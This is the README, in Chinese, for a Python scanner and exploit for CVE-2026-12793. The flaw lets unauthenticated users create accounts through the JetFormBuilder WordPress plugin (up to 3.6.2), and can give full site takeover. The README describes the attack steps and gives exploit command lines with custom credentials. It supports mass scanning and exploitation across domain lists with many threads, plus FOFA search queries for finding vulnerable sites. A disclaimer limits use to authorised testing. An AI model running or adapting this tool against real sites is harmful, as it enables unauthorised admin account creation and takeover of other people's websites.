Python PoC 扫描器和针对 CVE-2026-12793 的漏洞利用程序,该漏洞是 JetFormBuilder <=3.6.2 中的一个未认证权限提升漏洞,可创建 WordPress 管理员账户。
针对 WordPress 插件 JetFormBuilder — Dynamic Blocks Form Builder(Crocoblock)中 CVE-2026-12793 的概念验证扫描器与漏洞利用工具。
| CVE | CVE-2026-12793 |
| 插件 | jetformbuilder |
| 受影响版本 | ≤ 3.6.2 |
| 修复版本 | 3.6.2.1+ |
| CVSS | 9.8 严重 |
| 认证 | 未认证 |
| CWE | CWE-269 — 权限管理不当 |
| 研究员 | daroo (Wordfence) |
该插件在将 _jet_engine_booking_form_id 所引用文章的区块内容作为表单 schema 加载并执行提交后操作之前,未验证该 ID 是否指向已发布的 jet-form-builder 自定义文章类型。
未认证攻击者可提交精心构造的 AJAX 请求,触发 Register User 操作(wp_insert_user)并创建新的 WordPress 账户。若目标表单被错误配置为高权限角色(例如 administrator),则可导致整站接管。
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created
Block_Helper::is_valid_form_post() — 仅接受已发布的 jet-form-builder CPTForm_Handler::set_form_id() 拒绝无效的表单 IDwp_insert_user / wp_update_user 作为回调被阻止)requestspip install requests urllib3
python poc.py -u https://target.example --mode check
python poc.py --list domains.txt --mode check --threads 30 --quiet
输入格式:每行一个域名/URL、FOFA CSV(host,domain),或上次运行生成的 candidates.jsonl。
python poc.py -u https://target.example --mode exploit \
--form-id 1858 \
--page-url /register/ \
--fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
--username myuser \
--email [email protected] \
--password 'SecurePass123!' \
--verify
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify
| 文件 | 内容 |
|---|---|
hits.txt | 存在漏洞 / 已被利用的目标 URL |
{
"target": "https://target.example",
"version": "3.3.3",
"form_id": 1858,
"page_url": "https://target.example/register/",
"fields": {
"login": "user_login",
"email": "user_email",
"password": "user_pass"
}
}
自动检测的字段名仅为启发式结果。利用前请务必验证并使用
--fields覆盖。
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"
版本检查:
/wp-content/plugins/jetformbuilder/readme.txt
查找 Stable tag: ≤ 3.6.2。
本工具仅供授权的安全测试与教育目的使用。未经授权访问计算机系统属于违法行为。作者对任何滥用行为不承担任何责任。
MIT
| 参数 | 描述 |
|---|
-u, --url | 单一目标 URL |
--list | 目标列表文件 |
--mode | check(默认)或 exploit |
--form-id | 已知的 JetFormBuilder 表单文章 ID |
--page-url | 嵌入表单的页面(referer),例如 /register/ |
--fields | 字段映射:login=x,email=y,password=z |
--paths | 用于爬取表单的额外路径 |
--username / --email / --password | 漏洞利用所用凭据(省略则随机生成) |
--verify | 提交后通过 wp-login.php 验证账户 |
-j, --threads | 工作线程数(默认:20) |
--timeout | HTTP 超时秒数(默认:20) |
--proxy | HTTP(S) 代理 URL |
--output | 完整 JSONL 日志(默认:cve_2026_12793_results.jsonl) |
--vuln-list | 命中列表(默认:hits.txt) |
--candidates-list | 候选 JSONL(默认:candidates.jsonl) |
-q, --quiet | 仅输出进度 |
candidates.jsonl可访问 Register User 探测的目标(form_id、page_url、fields) |
cve_2026_12793_results.jsonl | 每个目标的完整 JSON 结果 |